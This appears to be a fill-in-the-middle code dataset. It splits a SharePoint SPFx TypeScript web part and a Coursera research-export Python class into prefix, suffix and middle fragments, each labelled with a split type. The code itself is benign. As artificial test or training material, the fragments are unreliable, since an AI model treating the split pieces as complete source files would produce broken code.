protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
// During first opening we will fetch all lookup fields
// In order for fields to become visible we have to change the value of any of initially visible fields, like Item limit, or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
| config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) {
return errMsg;
}
}
return '';
}
} | if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName})); | random_line_split |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public | () {
super.onDispose();
}
public render(): void {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
}
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
// During first opening we will fetch all lookup fields
// In order for fields to become visible we have to change the value of any of initially visible fields, like Item limit, or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName}));
config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) {
return errMsg;
}
}
return '';
}
}
| onDispose | identifier_name |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public onDispose() {
super.onDispose();
}
public render(): void |
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
// During first opening we will fetch all lookup fields
// In order for fields to become visible we have to change the value of any of initially visible fields, like Item limit, or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName}));
config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) {
return errMsg;
}
}
return '';
}
}
| {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
} | identifier_body |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public onDispose() {
super.onDispose();
}
public render(): void {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
}
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
// During first opening we will fetch all lookup fields
// In order for fields to become visible we have to change the value of any of initially visible fields, like Item limit, or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName}));
config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) |
}
return '';
}
}
| {
return errMsg;
} | conditional_block |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
Represents a export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
No validation is done with the exception that only specification of
scope is used (course/partner/group).
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def from_args(cls, **kwargs):
"""
Create a ExportResource object using the parameters required. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
|
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
return self._export_type
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK:
return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES'
else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
Context for this ExportRequest, assume that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
Identifier for the scope, assume that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
Human readable name for this scope context. course slugs for courses,
partner short names for partners, but only group ids for groups (api is
not open)
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
Display only property for schemas names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
| kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name']) | conditional_block |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
Represents a export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
No validation is done with the exception that only specification of
scope is used (course/partner/group).
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def | (cls, **kwargs):
"""
Create a ExportResource object using the parameters required. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name'])
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
return self._export_type
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK:
return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES'
else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
Context for this ExportRequest, assume that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
Identifier for the scope, assume that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
Human readable name for this scope context. course slugs for courses,
partner short names for partners, but only group ids for groups (api is
not open)
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
Display only property for schemas names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
| from_args | identifier_name |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
Represents a export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
